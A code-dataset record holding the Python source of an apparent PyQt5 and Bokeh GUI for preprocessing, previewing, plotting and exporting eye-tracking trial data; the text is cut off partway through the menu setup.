return","repo_name":"darkernoise/AeroTracker","sub_path":"aero_tracker/sensor/sensor_device.py","file_name":"sensor_device.py","file_ext":"py","file_size_in_byte":3113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"14914019497","text":"import sys, traceback\nimport argparse\nimport numpy as np\nimport pickle\nimport easydict\nimport copy\nimport json\nimport csv\nimport os\n\nimport preprocessing\nfrom edfreader import read_edf\n\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtWebEngineWidgets import *\n\nfrom bokeh.plotting import *\nfrom bokeh.models import *\nfrom bokeh.transform import *\nfrom bokeh import events\nfrom bokeh import palettes\nfrom bokeh.resources import CDN\nfrom bokeh.embed import file_html\nfrom bokeh.layouts import row, column\n\nDATA = {}\nMETADATA = {}\n\n\ndef JsonLoadsCheck(read, origin):\n # This function simply reads JSON, and makes sure a wrong file will not crash the program\n try:\n return json.loads(read)\n except json.decoder.JSONDecodeError:\n origin.log.insertPlainText('ERROR : JSON READ ERROR(The JSON contains mistakes : Replaced content with empty dict, might cause errors)\\n')\n return dict()\n\n\ndef GetNestedDic(dic, keys):\n # A tiny function to get values from dictionnaries nested into each other using a list of strings like an adress\n # If the dictionnary doens't exists, it creates an empty one\n for key in keys:\n try:\n dic = dic[key]\n except KeyError:\n dic[key] = dict()\n dic = dic[key]\n return dic\n\n\ndef SortPlotVariables(origin, settings):\n # This functions checks what variables are available for plottings and adds them as plottable variables\n # The condition being that the length of a list of numbers, must be the same as the length of time\n def rec_check(plot_variables, settings, lg, addr):\n for setting in settings:\n var = GetNestedDic(origin.CleanDATA[0], (addr + setting).split('.'))\n if type(var) is dict:\n rec_check(plot_variables, list(var.keys()), lg, setting + '.')\n elif type(var) is np.ndarray:\n if len(var) == lg:\n plot_variables.append(addr + setting)\n elif type(var) is list and var:\n if type(var[0]) in [int, float] and len(var) == lg:\n plot_variables.append(addr + setting)\n\n if 'time' not in settings:\n origin.check = False\n return\n origin.check = True\n lg = len(origin.CleanDATA[0]['time'])\n plot_variables = list()\n rec_check(plot_variables, settings, lg, '')\n\n origin.lock = True\n origin.plot_variables = plot_variables\n origin.dpdw1.clear()\n origin.dpdw2.clear()\n origin.dpdw3.clear()\n origin.dpdw1.addItems(origin.plot_variables)\n origin.dpdw2.addItems(origin.plot_variables)\n origin.dpdw3.addItems(origin.plot_variables)\n origin.lock = False\n\n\ndef FillTree(widget, value):\n # This function clears a PyQt Tree Widget, and then fills it with a dictionnary effectively updating it\n # It then calls a recursive function to go through the entire dictionnary and adds in every individual item\n def filltreeitem(item, value):\n item.setExpanded(True)\n i = 0\n if type(value) in [dict, easydict.EasyDict]:\n for key, val in value.items():\n child = QTreeWidgetItem()\n child.setText(0, str(key))\n item.addChild(child)\n filltreeitem(child, val)\n elif type(value) is list:\n for val in value:\n i += 1\n child = QTreeWidgetItem()\n item.addChild(child)\n if type(val) in [dict, easydict.EasyDict]:\n child.setText(0, str(i) + ' - [dict]')\n filltreeitem(child, val)\n elif type(val) is list:\n child.setText(0, str(i) + ' - [list]')\n filltreeitem(child, val)\n else:\n child.setText(0, str(val))\n child.setExpanded(True)\n else:\n child = QTreeWidgetItem()\n child.setText(0, str(value))\n item.addChild(child)\n widget.clear()\n filltreeitem(widget.invisibleRootItem(), value)\n\n\ndef UpdatePlot(origin):\n def assigncdsvalues(origin, idx):\n cdsvalues = {}\n texts = [origin.dpdw1.currentText(),\n origin.dpdw2.currentText(), origin.dpdw3.currentText()]\n for k in texts:\n cdsvalues[k] = GetNestedDic(origin.CacheDATA[idx], k.split('.'))\n return cdsvalues\n w = 500\n h = 500\n # Check some conditions to make that the plot can be created\n if origin.lock is True:\n return\n elif origin.check is False:\n origin.htmlreader.setHtml('The time must be selected in order to generate the plot!')\n return\n elif len(origin.plot_variables) == 0:\n origin.htmlreader.setHtml('No readable value selected!')\n return\n idx = origin.index.value() - 1\n # Creates a new filtered ColumnDataSource (custom data format for bokeh) with a copy of the selected values\n cdsvalues = assigncdsvalues(origin, idx)\n\n # Creates the color range\n color = linear_cmap(origin.dpdw3.currentText(), 'Plasma256',\n np.nanmin(cdsvalues[origin.dpdw3.currentText()]),\n np.nanmax(cdsvalues[origin.dpdw3.currentText()]))\n # Set the name of the plot axis according to\n # the selected values in x and y axis\n xaxis = origin.dpdw1.currentText()\n yaxis = origin.dpdw2.currentText()\n # Create the Bokeh plot, and adds the values as dots inside of it.\n p = figure(plot_width=w, plot_height=h, toolbar_location=\"above\",\n tools='pan,wheel_zoom,box_zoom,reset,hover,crosshair')\n plot = column(p, width=w, height=h)\n p.circle(x=xaxis, y=yaxis, source=cdsvalues, line_color=color, fill_color=color)\n # Put label with the name of selected axis on the plot + flip if need be\n p.xaxis.axis_label = xaxis.upper()\n p.yaxis.axis_label = yaxis.upper()\n p.y_range.flipped = origin.flipy.isChecked()\n # Transforms the bokeh plot into an HTML file,\n # and assign this file to the PyQt HTML reader\n html = file_html(plot, CDN)\n origin.htmlreader.setHtml(html)\n\n\ndef Cleaner(origin, data, settings, addr):\n # Recursive functions goes throught a dictionnary (CleanData, wich is initially a copy of CacheData)\n # Then it reads all the selected variables, checking what is selected or not\n # Finally it removes every unwanted variables that wasn't selected by the user\n # (Like unselected Data that was calculated because it was needed for a selected one)\n tmp = copy.copy(data)\n for elem in tmp:\n if type(tmp) is not dict:\n Cleaner(origin, elem, settings, '')\n else:\n var = GetNestedDic(origin.variables, (addr + elem).split('.'))\n if (list(var.keys()) != ['desc', 'func', 'name', 'reqs']):\n Cleaner(origin, tmp[elem], settings, addr + elem + '.')\n if not data[elem]:\n del data[elem]\n elif addr + elem not in settings:\n del data[elem]\n\n\ndef ComputeVariable(origin, setting, dic):\n def ChangeValue(dic, val, keys):\n for key in keys:\n if key != keys[-1]:\n try:\n dic = dic[key]\n except KeyError:\n dic[key] = dict()\n dic = dic[key]\n else:\n dic[key] = val\n\n reqs = GetNestedDic(origin.variables, (setting + '.reqs').split('.'))\n for req in reqs:\n reqval = GetNestedDic(dic[0], req.split('.'))\n if type(reqval) is np.ndarray:\n if reqval.size == 0:\n tmp = ComputeVariable(origin, req, dic)\n if tmp:\n return (tmp + ' for ' + setting)\n elif not reqval:\n tmp = ComputeVariable(origin, req, dic)\n if tmp:\n return (tmp + ' for ' + setting)\n\n funcstr = GetNestedDic(origin.variables, (setting + '.func').split('.'))\n if funcstr == {}:\n return (setting)\n if funcstr == 'NONE':\n return\n function = getattr(preprocessing, funcstr)\n\n for k in dic:\n args = []\n for req in reqs:\n args.append(GetNestedDic(k, req.split('.')))\n try:\n value = function(*args)\n if value:\n ChangeValue(k, value, setting.split('.'))\n except (TypeError, ValueError, IndexError) as e:\n origin.log.insertPlainText('ERROR for ' + funcstr + ' at setting ' + setting + '\\n' + traceback.format_exc())\n return\n\n\ndef CreateVariables(origin, data, settingslist):\n ret = copy.deepcopy(data)\n for setting in settingslist:\n check = GetNestedDic(origin.variables, setting.split('.'))\n if type(check) is dict:\n if (list(check.keys()) != ['desc', 'func', 'name', 'reqs']):\n continue\n tmp = ComputeVariable(origin, setting, ret)\n if tmp:\n return tmp\n return ret\n\n\ndef GatherSettings(origin):\n def recurse(parent_item, parent_str):\n for i in range(parent_item.childCount()):\n child = parent_item.child(i)\n grand_children = child.childCount()\n if grand_children > 0:\n recurse(child, parent_str + child.text(0) + '.')\n if child.checkState(0) == Qt.Checked:\n checked_items.append(parent_str + child.text(0))\n\n checked_items = []\n recurse(origin.selecttree.invisibleRootItem(), \"\")\n origin.settings = checked_items\n\n\ndef PushApply(origin):\n # This function is called whenever the user clicks on the Apply button, starting the creation of a data structure\n def CheckUserInput(k, origin):\n if 'Screen' in DATA[k][0]:\n bol = False\n bswc, bshc, bvd = False, False, False\n if 'screen_width_cm' not in DATA[k][0]['Screen']:\n bswc = True\n swc = QInputDialog.getDouble(origin, 'INPUT REQUIRED : Screen Width in cm', k + ':\\nScreen Width in cm',\n 1, -2147483647, 2147483647, 3)\n if 'screen_height_cm' not in DATA[k][0]['Screen']:\n bshc = True\n shc = QInputDialog.getDouble(origin, 'INPUT REQUIRED : Screen Height in cm', k + ':\\nScreen Height in cm',\n 1, -2147483647, 2147483647, 3)\n if 'viewing_Distance_cm' not in DATA[k][0]['Screen']:\n bvd = True\n vd = QInputDialog.getDouble(origin, 'INPUT REQUIRED : User/Screen distance in cm', k + ':\\nUser/Screen distance in cm',\n 1, -2147483647, 2147483647, 3)\n else:\n bol = True\n bswc, bshc, bvd = True, True, True\n swc = QInputDialog.getDouble(origin, 'INPUT REQUIRED : Screen Width in cm', k + ':\\nScreen Width in cm',\n 1, -2147483647, 2147483647, 3)\n shc = QInputDialog.getDouble(origin, 'INPUT REQUIRED : Screen Height in cm', k + ':\\nScreen Height in cm',\n 1, -2147483647, 2147483647, 3)\n vd = QInputDialog.getDouble(origin, 'INPUT REQUIRED : User/Screen distance in cm', k + ':\\nUser/Screen distance in cm',\n 1, -2147483647, 2147483647, 3)\n for j in DATA[k]:\n if bol is True:\n j['Screen'] = dict()\n if bswc is True:\n j['Screen']['screen_width_cm'] = swc[0]\n if bshc is True:\n j['Screen']['screen_height_cm'] = shc[0]\n if bvd is True:\n j['Screen']['viewing_Distance_cm'] = vd[0]\n\n def LoadMetadata(origin, data):\n def rec_remove_list(dic, datalen, idx):\n for key, item in dic.items():\n if type(item) is dict:\n rec_remove_list(item, datalen, idx)\n elif type(item) is list:\n lg = len(item)\n if lg == datalen:\n dic[key] = item[idx]\n datalen = len(data)\n for elem in METADATA:\n i = 0\n while i < datalen:\n tmp = copy.copy(METADATA[elem])\n rec_remove_list(tmp, datalen, i)\n data[i].update(tmp)\n i += 1\n\n # Check if there is any data loaded\n if not DATA:\n origin.log.insertPlainText('ERROR : NO DATA (You either have not loaded any data files, or data did not read correctly)\\n')\n return\n # Read the selected settings in the variable trees, creating a list of adresses, used later or for calculations\n GatherSettings(origin)\n # Create or reset the CacheDATA\n origin.CacheDATA = []\n for k in DATA:\n # For every loaded data file: Add all the Metadata, ask what is the screen size in cm and user distance\n LoadMetadata(origin, DATA[k])\n CheckUserInput(k, origin)\n # Creates the data structure, and then check if there is no error returned, if not, adds it to CacheData\n tmp = CreateVariables(origin, DATA[k], origin.settings)\n if type(tmp) is str:\n origin.log.insertPlainText('ERROR : MISSING REQUIREMENT :' + tmp + '(Your loaded files do not have the required data needed for calculations)\\n')\n return\n else:\n origin.CacheDATA += tmp\n # When all computation is done, creates copy of CacheData, and then call Cleaner on this copy, removing unwanted data\n origin.CleanDATA = copy.deepcopy(origin.CacheDATA)\n Cleaner(origin, origin.CleanDATA, origin.settings, '')\n # Create a \"tag\" data, allowing the user to comment every trial, tagging them to their liking\n for k in origin.CleanDATA:\n try:\n if not k['tag']:\n k['tag'] = None\n except KeyError:\n k['tag'] = None\n # Check the amount of trials for trial selection in plotting later on\n origin.index.setMaximum(len(origin.CacheDATA))\n # Clear and then fill the data structure previsualisation tree\n origin.prevtree.clear()\n FillTree(origin.prevtree, origin.CleanDATA)\n origin.prevtree.collapseAll()\n # Sort wich data is plottable, and wich is not, and then creates the plot\n SortPlotVariables(origin, origin.settings)\n UpdatePlot(origin)\n\n\ndef PushReset(origin):\n # This function is called whenever the user clicks on the Reset button\n # It deletes and reset absolutely everything, be it loaded data, settings, metadata, or edf configuration\n DATA.clear()\n METADATA.clear()\n origin.savesettings = []\n origin.mdatafiles = ()\n origin.datafiles = ()\n origin.edfstart = None\n origin.edfevents = []\n origin.log.clear()\n LoadSettings(origin)\n ResetMetadata(origin)\n\n\ndef Export(origin):\n # This function is called and the user wants to export the CleanDATA structure\n # The jsonify class and the tsvify function are here to get rid of some python specifict data format\n # making the data code agnostic and not Python only\n class jsonify(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, np.integer):\n return int(obj)\n elif isinstance(obj, np.floating):\n return float(obj)\n elif isinstance(obj, np.ndarray):\n return obj.tolist()\n else:\n return super(jsonify, self).default(obj)\n\n def tsvify(data):\n for k in data:\n if type(data) is dict:\n if type(data[k]) in [list, tuple, dict]:\n tsvify(data[k])\n elif type(data[k]) is np.ndarray:\n data[k] = data[k].tolist()\n elif type(data[k]) is np.floating:\n data[k] = float(data[k])\n elif type(data[k]) is np.integer:\n data[k] = int(data[k])\n elif type(k) in [list, tuple, dict]:\n tsvify(k)\n elif type(k) is np.floating:\n k = float(k)\n elif type(k) is np.integer:\n k = int(k)\n elif type(k) is np.ndarray:\n k = k.to_list()\n\n # Ask the user where and under what name and format the file will be save\n addr = QFileDialog.getSaveFileName(directory='finalstructures', filter='Pickle format(*.pkl);;JavaScript Object Notation(*.json);;Comma Separated Values(*.csv);;Tabulation Separated Values(*.tsv)')\n # Check what file format was selected and writes down the data structure accordingly\n i, j = os.path.splitext(addr[0])\n if j == '.pkl':\n with open(addr[0], 'wb') as file:\n f = pickle.Pickler(file)\n f.dump(origin.CleanDATA)\n elif j == '.json':\n with open(addr[0], 'w') as file:\n file.write(json.dumps(origin.CleanDATA, cls=jsonify))\n elif j == '.tsv' or j == 'csv':\n with open(addr[0], 'w') as file:\n if j == '.tsv':\n w = csv.DictWriter(file, origin.CleanDATA[0].keys(), delimiter='\\t')\n else:\n w = csv.DictWriter(file, origin.CleanDATA[0].keys())\n tmp = copy.deepcopy(origin.CleanDATA)\n tsvify(tmp)\n w.writeheader()\n w.writerows(tmp)\n\n\ndef OpenFile(origin, boot=False, clean=False):\n # This function is used when the user wants to load data into the programm\n # readdata is used and an EDF (asc format) is loaded in, reading the file and returning a python dict\n # updatevariables is a function that updates the selectable data list, adding anything that is new\n def readdata(path):\n while not origin.edfstart:\n ret = QInputDialog.getText(origin, 'EDF READER SETTINGS', 'Trial separator message')\n if ret[1] is True:\n origin.edfstart = ret[0]\n while not origin.edfevents:\n ret = QInputDialog.getText(origin, 'EDF READER SETTINGS', 'List of User-defined events in the edf file (format exemple= \"event0,event1,event2,...\")')\n if ret[1] is True:\n origin.edfevents = ret[0].split(',')\n return(read_edf(path, origin.edfstart, list_events=origin.edfevents))\n\n def updatevariables(origin):\n def recursivecheck(newvars):\n for k in newvars:\n bol = True\n if type(newvars[k]) is dict:\n if list(newvars[k].keys()) == ['x', 'y']:\n bol = True\n else:\n bol = False\n recursivecheck(newvars[k])\n if bol is True:\n newvars[k] = dict()\n newvars[k]['desc'] = \"DATA\"\n newvars[k]['func'] = \"NONE\"\n newvars[k]['name'] = \"DATA\"\n newvars[k]['reqs'] = []\n\n def recursiveupdate(old, new):\n for k in old:\n if list(old[k].keys()) != ['desc', 'func', 'name', 'reqs']:\n if k in list(new.keys()):\n recursiveupdate(old[k], new[k])\n new[k].update(old[k])\n\n newvars = {}\n for k in DATA:\n newvars.update(DATA[k][0])\n tmp = copy.deepcopy(newvars)\n recursivecheck(tmp)\n recursiveupdate(origin.variables, tmp)\n origin.variables.update(tmp)\n SetTreeSettings(origin)\n\n # Check if the function was called at the start, wich loads in previously loaded data, when PRPG was closed\n if boot is True:\n if not origin.datafiles:\n return\n else:\n origin.datafiles = QFileDialog.getOpenFileNames(directory='data', filter='Data Format (*.asc *.pkl *.json)')\n # Check if the user is loading the Clear Data function, wich removes all loaded data before loading the new one\n if clean is True:\n DATA.clear()\n # Read the data with the appropriate function, returning a dictionnary\n # If the Data is an EDF (under asc format) file, it does have to call edfreader function\n for k in origin.datafiles[0]:\n with open(k, 'rb') as file:\n i, j = os.path.splitext(k)\n if j == '.json':\n DATA[k] = json.load(file, encoding='latin1')\n elif j == '.pkl':\n DATA[k] = pickle.load(file, encoding='latin1')\n else:\n DATA[k] = readdata(k)\n # Check if the Data exists and adds it in the program, otherwise don't add it, and put a message in the error log\n if DATA[k]:\n updatevariables(origin)\n else:\n del DATA[k]\n origin.log.insertPlainText('ERROR : COULD NOT FIND ANY TRIAL FOR FILE :' + i + '(The file may be wrong or the EDF Reader trial separator event is not set correctly)\\n')\n # Update the lists in the Data Manager\n UpdateDataLists(origin.datamanager, origin)\n\n\ndef OpenMetadata(origin, boot=False):\n # Very similar to OpenFile, but for Metadata files\n # loadseparatedvalues is called when csv or tsv files are loaded in and need to be sorted in a dictionnary\n def loadseparatedvalues(name, origin, j):\n data = list()\n if j == '.csv':\n with open(name, 'r') as file:\n tmp = csv.reader(file, delimiter=',')\n for line in tmp:\n data.append(line)\n elif j == '.tsv':\n with open(name, 'r') as file:\n tmp = csv.reader(file, delimiter='\\t')\n for line in tmp:\n data.append(line)\n names = copy.copy(data[0])\n del data[0]\n ret = dict()\n y = 0\n for k in names:\n ret[k] = []\n for i in data:\n ret[k].append(i[y])\n y += 1\n for k in ret:\n if len(ret[k]) == 1:\n ret[k] = ret[k][0]\n return ret\n\n def updatevariables(origin):\n def recursivecheck(newvars):\n for k in newvars:\n bol = True\n if type(newvars[k]) is dict:\n if list(newvars[k].keys()) == ['x', 'y']:\n bol = True\n else:\n bol = False\n recursivecheck(newvars[k])\n if bol is True:\n newvars[k] = dict()\n newvars[k]['desc'] = \"DATA\"\n newvars[k]['func'] = \"NONE\"\n newvars[k]['name'] = \"DATA\"\n newvars[k]['reqs'] = []\n\n def recursiveupdate(old, new):\n for k in old:\n if list(old[k].keys()) != ['desc', 'func', 'name', 'reqs']:\n if k in list(new.keys()):\n recursiveupdate(old[k], new[k])\n new[k].update(old[k])\n\n newvars = {}\n for k in METADATA:\n newvars.update(METADATA[k])\n tmp = copy.deepcopy(newvars)\n recursivecheck(tmp)\n recursiveupdate(origin.variables, tmp)\n origin.variables.update(tmp)\n SetTreeSettings(origin)\n\n if boot is True:\n if not origin.mdatafiles:\n return\n else:\n origin.mdatafiles = QFileDialog.getOpenFileNames(directory='data', filter='Metadata Format (*.pkl *.json *.tsv *.csv)')\n for k in origin.mdatafiles[0]:\n with open(k, 'rb') as file:\n i, j = os.path.splitext(k)\n if j == '.tsv' or j == '.csv':\n METADATA[k] = loadseparatedvalues(k, origin, j)\n elif j == '.pkl':\n METADATA[k] = pickle.load(file, encoding='latin1')\n else:\n METADATA[k] = JsonLoadsCheck(file.read(), origin)\n updatevariables(origin)\n UpdateDataLists(origin.datamanager, origin)\n\n\ndef ResetMetadata(origin):\n # Called in PushReset or when the users clics on Reset Metadata, it simply removes all the Metadata\n origin.variables = copy.copy(origin.safevariables)\n METADATA = {}\n SetTreeSettings(origin)\n UpdateDataLists(origin.datamanager, origin)\n\n\ndef SaveSettings(origin):\n # Saves what are the selected settings in the variables tree widgets\n GatherSettings(origin)\n origin.savesettings = origin.settings\n\n\ndef LoadSettings(origin):\n # Loads the saved settings, and then automatically selects item in the variables trees\n def recurseclear(parent_item):\n for i in range(parent_item.childCount()):\n child = parent_item.child(i)\n grand_children = child.childCount()\n if grand_children > 0:\n recurseclear(child)\n child.setCheckState(0, Qt.Unchecked)\n\n def recurse(parent_item, setting, idx=0):\n for i in range(parent_item.childCount()):\n child = parent_item.child(i)\n grand_children = child.childCount()\n try:\n if grand_children > 0:\n recurse(child, setting, idx + 1)\n elif child.text(0) == setting[idx]:\n child.setCheckState(0, Qt.Checked)\n except IndexError:\n pass\n\n origin.settings = origin.savesettings\n recurseclear(origin.selecttree.invisibleRootItem())\n for setting in origin.settings:\n recurse(origin.selecttree.invisibleRootItem(), setting.split('.'))\n\n\ndef ChangeEDFReaderStart(origin):\n # Called when the user wants to change the trial separator event, or when it is needed\n val = QInputDialog.getText(origin, 'EDF READER SETTINGS : Trial Separator Event', 'Insert wich event is used to define the beginning of a single trial')\n if val[1] is True:\n origin.edfstart = val[0]\n\n\ndef ChangeEDFReaderEvents(origin):\n # Called when the user wants to change the events that need to be found in the edf file or when needed\n val = QInputDialog.getText(origin, 'EDF READER SETTINGS : Event list', 'List of User-defined events in the edf file (format exemple= \"event0,event1,event2,...\")')\n if val[1] is True:\n origin.edfevents = val[0].split(',')\n\n\ndef SavePreset(origin, close=False):\n # Save a preset of settings, containing the loaded data, metadata, edfreader settings, and the selected variables\n # The file is saved as a JSON, either a user made one, or an invisible one when the programm is closed\n SaveSettings(origin)\n preset = dict()\n preset['settings'] = origin.settings\n preset['mdatafiles'] = origin.mdatafiles\n preset['datafiles'] = origin.datafiles\n preset['edfstart'] = origin.edfstart\n preset['edfevents'] = origin.edfevents\n if close is True:\n file = open('presets/.lastpreset.json', 'w')\n else:\n dialog = QFileDialog.getSaveFileName(directory='presets', filter='JavaScript Object Notation(*.json)')\n if dialog[0]:\n file = open(dialog[0], 'w')\n else:\n return\n file.write(json.dumps(preset, sort_keys=True, indent=4))\n file.close()\n\n\ndef LoadPreset(origin, boot=False):\n # This reads a preset of settings, either user made, or the invisible one made when the programm exits\n if boot is True:\n try:\n file = open('presets/.lastpreset.json')\n preset = JsonLoadsCheck(file.read(), origin)\n except FileNotFoundError:\n preset = {}\n else:\n file = open(QFileDialog.getOpenFileName(directory='presets', filter='JavaScript Object Notation (*.json)')[0], 'r')\n preset = JsonLoadsCheck(file.read(), origin)\n\n try:\n origin.mdatafiles = preset['mdatafiles']\n except KeyError:\n origin.mdatafiles = ()\n try:\n origin.datafiles = preset['datafiles']\n except KeyError:\n origin.datafiles = ()\n try:\n origin.edfstart = preset['edfstart']\n except KeyError:\n origin.edfstart = ()\n try:\n origin.edfevents = preset['edfevents']\n except KeyError:\n origin.edfevents = ()\n OpenMetadata(origin, True)\n OpenFile(origin, True)\n try:\n origin.savesettings = preset['settings']\n except KeyError:\n origin.savesettings = []\n LoadSettings(origin)\n\n\ndef TrialTag(origin):\n elem = origin.prevtree.selectedItems()[0]\n if not elem.parent():\n val = QInputDialog.getText(origin, 'TRIAL TAG', 'Insert a comment to tag the event, nothing to un-tag')\n if val[1] is False:\n return\n else:\n idx = origin.prevtree.invisibleRootItem().indexOfChild(elem)\n origin.CleanDATA[idx]['tag'] = val[0]\n for i in range(elem.childCount()):\n child = elem.child(i)\n if child.text(0) == 'tag':\n child.child(0).setText(0, val[0])\n\n\ndef SetTreeSettings(origin):\n # This function clears and then fills the variable selection tree\n def SubTreeSettings(origin, lst, parent):\n child = QTreeWidgetItem(parent)\n child.setText(0, lst)\n child.setFlags(child.flags() | Qt.ItemIsTristate | Qt.ItemIsUserCheckable)\n child.setCheckState(0, Qt.Unchecked)\n\n SaveSettings(origin)\n origin.selecttree.clear()\n headerItem = QTreeWidgetItem()\n item = QTreeWidgetItem()\n for k in origin.variables:\n parent = QTreeWidgetItem(origin.selecttree)\n parent.setText(0, k)\n parent.setFlags(parent.flags() | Qt.ItemIsTristate | Qt.ItemIsUserCheckable)\n parent.setCheckState(0, Qt.Unchecked)\n for j in origin.variables[k]:\n if (list(origin.variables[k].keys()) != ['desc', 'func', 'name', 'reqs']):\n SubTreeSettings(origin, j, parent)\n LoadSettings(origin)\n\n\ndef OpenDataManager(origin):\n # This function is used when the user wants to access the data manager windows\n # It either creates it, or places it in front of the main window\n if origin.datamanageropen is False:\n origin.datamanageropen = True\n origin.datamanager = (DataManager(origin))\n else:\n origin.datamanager.hide()\n origin.datamanager.show()\n\n\ndef UpdateDataLists(manager, origin):\n # This functions updates the loaded data lists in the data manager, it uses the dict keys of DATA and METADATA\n if origin.datamanageropen is False:\n return()\n manager.datalist.clear()\n manager.metadatalist.clear()\n for k in DATA:\n manager.datalist.insertItem(0, k)\n for k in METADATA:\n manager.metadatalist.insertItem(0, k)\n\n\ndef DeleteData(manager, origin):\n # This function removes loaded data that is selected in the data manager tree\n elems = list()\n for k in manager.datalist.selectedItems():\n elems.append(k.text())\n for k in elems:\n del DATA[k]\n UpdateDataLists(manager, origin)\n\n\ndef DeleteMetadata(manager, origin):\n # This function removes loaded metadata that is selected in the data manager tree\n elems = list()\n for k in manager.metadatalist.selectedItems():\n elems.append(k.text())\n for k in elems:\n del METADATA[k]\n UpdateDataLists(manager, origin)\n\n\nclass DataManager(QMainWindow):\n # The Data manager windows is a small windows that is used to check what is the currently loaded data and metadata\n # It does contains a small amount of push buttons, useful for deletion and addition of datafiles\n def __init__(self, origin):\n QWidget.__init__(self)\n self.area = QWidget()\n self.setWindowTitle(\"PREPROGUI Data Manager\")\n self.setCentralWidget(self.area)\n self.layt = QGridLayout()\n self.area.setLayout(self.layt)\n self.InitDataLists(origin)\n self.InitButtons(origin)\n self.show()\n\n def InitDataLists(self, origin):\n self.datalabel = QLabel('Loaded Data List')\n self.metadatalabel = QLabel('Loaded Metadata List')\n self.layt.addWidget(self.datalabel, 0, 0, 1, 2)\n self.layt.addWidget(self.metadatalabel, 0, 2, 1, 2)\n self.datalist = QListWidget()\n self.metadatalist = QListWidget()\n self.datalist.setSelectionMode(QAbstractItemView.ExtendedSelection)\n self.metadatalist.setSelectionMode(QAbstractItemView.ExtendedSelection)\n self.layt.addWidget(self.datalist, 1, 0, 1, 2)\n self.layt.addWidget(self.metadatalist, 1, 2, 1, 2)\n UpdateDataLists(self, origin)\n\n def InitButtons(self, origin):\n self.deldata = QPushButton('Delete Selected Data')\n self.adddata = QPushButton('Add Data')\n self.delmetadata = QPushButton('Delete Selected Metadata')\n self.addmetadata = QPushButton('Add Metadata')\n self.deldata.clicked.connect(lambda: DeleteData(self, origin))\n self.adddata.clicked.connect(lambda: OpenFile(origin))\n self.delmetadata.clicked.connect(lambda: DeleteMetadata(self, origin))\n self.addmetadata.clicked.connect(lambda: OpenMetadata(origin))\n self.layt.addWidget(self.deldata, 2, 0)\n self.layt.addWidget(self.adddata, 2, 1)\n self.layt.addWidget(self.delmetadata, 2, 2)\n self.layt.addWidget(self.addmetadata, 2, 3)\n\n\nclass MainWindow(QMainWindow):\n # Init a new window and all the PyQt5 widgets required to run the GUI\n def __init__(self):\n def Start(self):\n LoadPreset(self, True)\n self.show()\n\n QWidget.__init__(self)\n self.area = QWidget()\n self.resize(1280, 800)\n self.setWindowTitle(\"PREPROGUI\")\n self.setCentralWidget(self.area)\n\n self.CacheDATA = []\n self.CleanDATA = []\n self.InitLayouts()\n self.InitSettings()\n self.InitPreview()\n self.InitPlot()\n self.InitMenu()\n\n Start(self)\n\n def closeEvent(self, event):\n SavePreset(self, close=True)\n # reply = QMessageBox.question(self, 'Window Close', 'Are you sure you want to close the window?',\n # \t\tQMessageBox.Yes | QMessageBox.No, QMessageBox.No)\n # if reply == QMessageBox.Yes:\n # \tevent.accept()\n # pront('Window closed')\n # else:\n # \tevent.ignore()\n\n def InitLayouts(self):\n self.layt = QGridLayout()\n self.area.setLayout(self.layt)\n self.settingslayt = QVBoxLayout()\n self.previewlayt = QGridLayout()\n self.plotlayt = QVBoxLayout()\n self.layt.addLayout(self.settingslayt, 0, 1)\n self.layt.addLayout(self.previewlayt, 0, 2)\n self.layt.addLayout(self.plotlayt, 0, 3, 1, 3)\n self.log = QPlainTextEdit()\n self.log.setReadOnly(True)\n\n def InitSettings(self):\n\n # User selection Groupbox\n groupbox = QGroupBox()\n layt = QGridLayout()\n groupbox.setLayout(layt)\n layt.setSpacing(3)\n\n # Selection Tree Widget\n with open('variables.json', 'r') as file:\n self.safevariables = JsonLoadsCheck(file.read(), self)\n self.variables = copy.copy(self.safevariables)\n self.selecttree = QTreeWidget()\n SetTreeSettings(self)\n self.settingslayt.addWidget(self.selecttree)\n\n # Initializing some variables used later\n self.edfstart = ''\n self.edfevents = []\n self.settings = []\n self.savesettings = []\n self.mdatafiles = ()\n self.datafiles = ()\n\n # Apply & Reset Buttons\n pushreset = QPushButton('Clear Everything')\n pushapply = QPushButton('Apply')\n pushreset.clicked.connect(lambda: PushReset(self))\n pushapply.clicked.connect(lambda: PushApply(self))\n layt.addWidget(pushreset, 2, 0)\n layt.addWidget(pushapply, 2, 1)\n\n self.settingslayt.addWidget(groupbox)\n\n def InitPreview(self):\n self.prevtree = QTreeWidget()\n self.prevtree.itemDoubleClicked.connect(lambda: TrialTag(self))\n FillTree(self.prevtree, self.CleanDATA)\n self.prevtree.collapseAll()\n self.previewlayt.addWidget(self.prevtree, 0, 0, 1, 1)\n self.previewlayt.addWidget(self.log, 1, 0, 40, 1)\n\n def InitPlot(self):\n self.check = False\n self.htmlreader = QWebEngineView()\n self.htmlreader.setFixedSize(600, 600)\n self.plot_variables = list()\n\n groupbox = QGroupBox('Axis Selection')\n groupbox.setFixedSize(600, 50)\n self.index = QSpinBox()\n self.index.setMinimum(1)\n self.index.setMaximumWidth(60)\n self.index.setMaximum(2)\n self.index.setWrapping(True)\n self.index.valueChanged.connect(lambda checked: UpdatePlot(self))\n\n self.dpdw1 = QComboBox()\n self.dpdw2 = QComboBox()\n self.dpdw3 = QComboBox()\n self.flipy = QCheckBox('Flip Y')\n\n layt = QHBoxLayout()\n layt.setContentsMargins(3, 3, 3, 3)\n groupbox.setLayout(layt)\n layt.addWidget(QLabel('Trial Index'))\n layt.addWidget(self.index)\n layt.addWidget(QLabel('X-Axis'))\n layt.addWidget(self.dpdw1)\n layt.addWidget(QLabel('Y-Axis'))\n layt.addWidget(self.dpdw2)\n layt.addWidget(QLabel('Color'))\n layt.addWidget(self.dpdw3)\n layt.addWidget(self.flipy)\n self.lock = False\n self.dpdw1.currentTextChanged.connect(lambda checked: UpdatePlot(self))\n self.dpdw2.currentTextChanged.connect(lambda checked: UpdatePlot(self))\n self.dpdw3.currentTextChanged.connect(lambda checked: UpdatePlot(self))\n self.flipy.stateChanged.connect(lambda checked: UpdatePlot(self))\n\n self.plotlayt.addWidget(self.htmlreader)\n self.plotlayt.addWidget(groupbox)\n\n def InitMenu(self):\n self.datamanager = 0\n self.datamanageropen = False\n menubar = self.menuBar()\n\n filemenu = menubar.addMenu('File')\n placeholder = filemenu.addAction('Open Datafiles (Clear Data)')\n placeholder.triggered.connect(lambda: OpenFile(self, clean=True))\n placeholder = filemenu.addAction('Add Datafiles')\n 